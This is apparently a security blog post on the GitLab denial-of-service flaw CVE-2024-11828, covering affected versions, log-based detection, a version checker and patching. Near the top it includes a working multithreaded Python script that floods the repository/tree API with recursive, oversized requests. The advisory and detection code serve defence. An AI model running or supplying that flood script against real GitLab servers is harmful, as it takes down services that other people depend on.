Introduction
A new denial-of-service (DoS) vulnerability, tracked as CVE-2024-11828, was discovered in GitLab Community Edition (CE) and Enterprise Edition (EE). The issue affects a very large number of installations and was caused by a regression: a security hole that an earlier fix had closed was reopened by later changes. This post covers what CVE-2024-11828 is, how it works, the details of the exploit with code snippets, and how you can protect your systems.
What is CVE-2024-11828?
CVE-2024-11828 is a vulnerability in the way GitLab handled certain API requests. By sending specially crafted API calls, an attacker could cause the GitLab server to slow down or even crash, leading to a denial of service. It is also an example of how a patch can be undone by later changes; this is called a regression.
Impacted Versions
- All GitLab CE/EE versions from 13.2.4 up to (but not including) 17.4.5
Details: How Does the Exploit Work?
The vulnerable GitLab instances expose REST API endpoints that, when called with malformed or specially crafted parameters, cause the server to perform heavy processing. Because of the regression, the checks that should have rejected these requests were not working as intended.
Typical Attack Flow
1. The attacker crafts a special API call with parameters designed to trigger expensive backend operations.
Sample Exploit Script
While it's unethical to attack real servers, here's a simplified Python example, for educational purposes, showing how a DoS attack could be automated:
```python
import requests
import threading

API_URL = "https://your-gitlab-instance.example.com/api/v4/projects/1/repository/tree"
HEADERS = {"PRIVATE-TOKEN": "YOUR_TOKEN_HERE"}  # use a valid token or attack unauthenticated endpoints


def dos_attack():
    # Normally, parameters like 'recursive=true' can increase load
    params = {'recursive': 'true', 'per_page': 100000}
    while True:
        try:
            r = requests.get(API_URL, headers=HEADERS, params=params, timeout=5)
            print(f"Status: {r.status_code}")
        except Exception as e:
            print(f"Error: {e}")


threads = []
for _ in range(20):  # 20 threads for massive effect
    t = threading.Thread(target=dos_attack)
    t.start()
    threads.append(t)
```
> Warning: Don't use this code against any system you do not own or have explicit permission to test.
This script hammers a repository/tree endpoint, requesting a huge number of files recursively, which can tie up CPU and memory on the server.
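The defensive counterpart to the script above is spotting this traffic pattern in your own access logs before the instance falls over. The following is an added example, not code from the original post or from GitLab: it parses nginx-style combined log lines (the format assumed here), picks out GET requests to `/api/v4/projects/:id/repository/tree` that ask for `recursive=true` or a `per_page` above GitLab's documented maximum of 100, and reports any source address that issues more than a threshold of such requests within a 60-second sliding window. The log lines, addresses and thresholds are constructed for the example.

```python
# Added example (not from the post or from GitLab): flag bursts of expensive
# repository/tree requests in a web-server access log.
import re
from collections import defaultdict, deque
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# nginx "combined" log format, as commonly written by the proxy in front of GitLab.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# Project ids may be URL-encoded paths (group%2Fproject), which contain no '/'.
TREE_PATH_RE = re.compile(r"^/api/v4/projects/[^/]+/repository/tree/?$")

PER_PAGE_CAP = 100     # GitLab's documented per_page maximum
WINDOW_SECONDS = 60    # sliding window length (assumed value, tune to your traffic)
BURST_THRESHOLD = 10   # expensive requests per source per window before flagging (assumed)


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "ts": ts, "method": m["method"],
            "target": m["target"], "status": int(m["status"])}


def is_expensive_tree_request(target):
    """True for /api/v4/projects/:id/repository/tree with recursive=true or an oversized per_page."""
    parts = urlsplit(target)
    if not TREE_PATH_RE.match(parts.path):
        return False
    q = parse_qs(parts.query)
    recursive = q.get("recursive", ["false"])[0].lower() == "true"
    try:
        per_page = int(q.get("per_page", ["20"])[0])
    except ValueError:
        per_page = 0  # garbage per_page is rejected by the API; do not count it as oversized
    return recursive or per_page > PER_PAGE_CAP


def find_bursts(lines):
    """Return {ip: peak count} for sources whose expensive tree requests in any
    WINDOW_SECONDS window reached BURST_THRESHOLD."""
    windows = defaultdict(deque)   # ip -> timestamps of recent expensive requests
    peaks = defaultdict(int)       # ip -> largest window population seen
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "GET" or not is_expensive_tree_request(rec["target"]):
            continue
        dq = windows[rec["ip"]]
        dq.append(rec["ts"])
        # Drop timestamps that have fallen out of the window ending at this request.
        while (rec["ts"] - dq[0]).total_seconds() > WINDOW_SECONDS:
            dq.popleft()
        peaks[rec["ip"]] = max(peaks[rec["ip"]], len(dq))
    return {ip: n for ip, n in peaks.items() if n >= BURST_THRESHOLD}


# Constructed sample log: 198.51.100.4 browses normally; 203.0.113.7 issues twelve
# recursive, oversized tree requests within about twenty seconds.
SAMPLE_LOG = [
    '198.51.100.4 - - [26/Nov/2024:19:15:%02d +0000] "GET /api/v4/projects/1/repository/tree'
    '?per_page=20 HTTP/1.1" 200 1532' % s
    for s in (1, 30)
] + [
    '203.0.113.7 - - [26/Nov/2024:19:15:%02d +0000] "GET /api/v4/projects/1/repository/tree'
    '?recursive=true&per_page=100000 HTTP/1.1" 200 98213' % s
    for s in range(5, 29, 2)
]

if __name__ == "__main__":
    for ip, peak in find_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {peak} expensive repository/tree requests within {WINDOW_SECONDS}s")
```

Run it against a real log with `find_bursts(open("access.log"))`. A single recursive tree request is normal behaviour for CI jobs and IDE integrations, so the signal is the rate per source, not the parameter itself; the threshold is a starting point to adjust against a baseline of your own traffic.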
How Was This Vulnerability Introduced?
CVE-2024-11828 was a regression: a fix for a similar earlier issue was undone by later code changes. When fixing one bug, developers sometimes remove or alter code that protected another part of the system, accidentally reviving a past issue.
How to Tell If You’re Affected
- If you’re running GitLab CE/EE between 13.2.4 and 17.4.4, or any 17.5 or 17.6 version before 17.5.3/17.6.1, you are likely vulnerable.
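Checking the version ranges above by eye is error-prone across three release series, so here is an added example (not code from the post or from GitLab) that encodes exactly those ranges: affected if the version is from 13.2.4 up to but not including 17.4.5, or a 17.5.x below 17.5.3, or a 17.6.x below 17.6.1. It accepts the version strings GitLab reports, such as `17.4.2-ee` or `v17.5.1`, and returns the fixed release to move to. Feeding it a real version string from your instance is up to you; the function itself performs no network access.

```python
# Added example (not from the post or from GitLab): map a GitLab version string to
# the CVE-2024-11828 affected ranges listed in the post.
import re
from typing import Optional, Tuple

Version = Tuple[int, int, int]

# (first affected, first fixed) for each affected range named in the post:
#   13.2.4 .. 17.4.4  -> fixed in 17.4.5
#   17.5.0 .. 17.5.2  -> fixed in 17.5.3
#   17.6.0            -> fixed in 17.6.1
AFFECTED_RANGES = (
    ((13, 2, 4), (17, 4, 5)),
    ((17, 5, 0), (17, 5, 3)),
    ((17, 6, 0), (17, 6, 1)),
)

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Version:
    """Extract MAJOR.MINOR.PATCH, ignoring a leading 'v' and any '-ee'/'-ce' suffix."""
    m = _VERSION_RE.match(text.strip().lstrip("vV"))
    if not m:
        raise ValueError(f"unrecognised GitLab version string: {text!r}")
    major, minor, patch = (int(part) for part in m.groups())
    return (major, minor, patch)


def is_affected(version: str) -> bool:
    """True if the version falls inside any affected range (tuple comparison is lexicographic)."""
    v = parse_version(version)
    return any(first <= v < fixed for first, fixed in AFFECTED_RANGES)


def recommended_upgrade(version: str) -> Optional[str]:
    """Return the fixed release closing the range the version sits in, or None if not affected."""
    v = parse_version(version)
    for first, fixed in AFFECTED_RANGES:
        if first <= v < fixed:
            return ".".join(str(n) for n in fixed)
    return None


if __name__ == "__main__":
    for sample in ("17.4.2-ee", "17.5.2-ce", "17.6.0", "17.6.1-ee", "13.2.3"):
        target = recommended_upgrade(sample)
        print(f"{sample}: {'upgrade to ' + target if target else 'not affected'}")
```

Note that 13.x through 17.4.x instances all map to 17.4.5 here because that is the fixed release closing that range; in practice an older series needs to follow GitLab's upgrade path to get there, which the official advisory linked below describes.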
How to Patch
- Upgrade GitLab immediately to 17.4.5, 17.5.3, or 17.6.1 (whichever matches your version series).
See the official advisory for upgrade instructions:
- GitLab Security Release: 17.6.1, 17.5.3, and 17.4.5
- CVE-2024-11828 on GitLab
Conclusion
CVE-2024-11828 highlights the danger of security regressions and why keeping software updated is so important. If you're running GitLab, patch as soon as possible to avoid being exposed to simple but devastating API-based denial-of-service attacks. Stay ahead by subscribing to GitLab's security advisories and routinely reviewing your access logs for unusual API activity.
If you want to read more, check out:
- GitLab's Release Notes
- NIST NVD CVE-2024-11828 Entry
Timeline
Published on: 11/26/2024 19:15:22 UTC